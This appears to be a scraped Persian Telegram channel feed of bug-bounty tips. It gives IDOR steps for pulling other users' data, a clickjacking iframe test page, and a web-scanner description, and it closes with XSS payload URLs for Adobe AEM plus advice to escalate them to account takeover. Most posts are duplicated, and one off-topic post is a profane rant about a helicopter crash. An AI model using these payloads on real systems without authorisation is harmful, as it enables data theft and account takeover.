This media is not supported in your browser
VIEW IN TELEGRAM
چگونه آسیبپذیری IDOR را که منجر به نشت اطلاعات کاربر میشود، آزمایش کردم؟
1. نقطه پایانی /me را به /users تغییر دهید.
2. متد GET را به متد POST تغییر دهید.
3. هدر Content-Type: application/json را اضافه کنید.
4. این پیلود را به بدنه درخواست HTTP اضافه کنید: {"ids":["1"]}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1. نقطه پایانی /me را به /users تغییر دهید.
2. متد GET را به متد POST تغییر دهید.
3. هدر Content-Type: application/json را اضافه کنید.
4. این پیلود را به بدنه درخواست HTTP اضافه کنید: {"ids":["1"]}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
روش تست اسیب پذیری clickjacking به صورت ساده:
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
<html>حال اگر دامنه در داخل iframe بارگذاری شود، هدف آسیب پذیر است
<head>
<title> clickjacking </title>
</head>
<body>
<p>WEBPAGE </p>
<iframe src="target.com" width="500" height="500"></iframe>
</body>
</html>
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
هدف این پروژه ساده سازی زمینه تست امنیت برنامه های پویا است. متا اسکنر OSTE یک اسکنر آسیب پذیری وب جامع است که چندین اسکنر DAST از جمله Nikto Scanner، OWASP ZAP، Nuclei، SkipFish و Wapiti را ترکیب می کند.
لیست آسیب پذیری های اصلی پشتیبانی شده:
SQL injection
Cross site scripting
OS command injection
XML injection
XSLT injection
XML External entites
code injection
host header injection
html injection
Template injection (server-side)
CRLF injection
OGNL injection
Skipfish Vulnerabilities support List.
Wapiti Vulnerabilities support List.
ZAP Active Attack list.
Nikto Vulnerabilities support List (Specified: Tunning 9 & 4).
Nuclei CVE-Template.
برای وارد شدن به آدرس گیت هاب کلیک کنید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
لیست آسیب پذیری های اصلی پشتیبانی شده:
SQL injection
Cross site scripting
OS command injection
XML injection
XSLT injection
XML External entites
code injection
host header injection
html injection
Template injection (server-side)
CRLF injection
OGNL injection
Skipfish Vulnerabilities support List.
Wapiti Vulnerabilities support List.
ZAP Active Attack list.
Nikto Vulnerabilities support List (Specified: Tunning 9 & 4).
Nuclei CVE-Template.
برای وارد شدن به آدرس گیت هاب کلیک کنید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
قضیه اون فیلمی که از یه مدرس پخش شده بود، من چیزی نگفتم ولی کامنت های اونو که دیدم، گفتم واقعا دمتون گرم❤️
خیلی عجیبه
اول اینکه بین ۳ تا بالگرد، دقیقا بالگردی که حاج ابرام توش بوده بگا رفته
دوم اینکه چرا قبل از پرواز وضعیت هوا رو پیش بینی نکردن:/
سوم اینکه یعنی هیچ کیر خری نبوده بتونن پیداش کنن؟
اول اینکه بین ۳ تا بالگرد، دقیقا بالگردی که حاج ابرام توش بوده بگا رفته
دوم اینکه چرا قبل از پرواز وضعیت هوا رو پیش بینی نکردن:/
سوم اینکه یعنی هیچ کیر خری نبوده بتونن پیداش کنن؟
👍1
نکات Bounty Bug: بیش از 15 مشکل XSS در یک برنامه گسترده با استفاده از AEM گزارش شده است! 🚀 اگر به یک برنامه هدف با استفاده از AEM برخورد کردید، مطمئن شوید که از این پیلود های XSS برای چند برد سریع استفاده می کنید!
1️⃣ https://target.com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target.com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3⃣ https://target.com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
همیشه سعی کنید این مسائل را به تصاحب حساب افزایش دهید تا شانس پرداخت با شدت بالا را داشته باشید. هوشیار باشید! 🕵️♂️💡
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1️⃣ https://target.com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target.com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3⃣ https://target.com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
همیشه سعی کنید این مسائل را به تصاحب حساب افزایش دهید تا شانس پرداخت با شدت بالا را داشته باشید. هوشیار باشید! 🕵️♂️💡
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit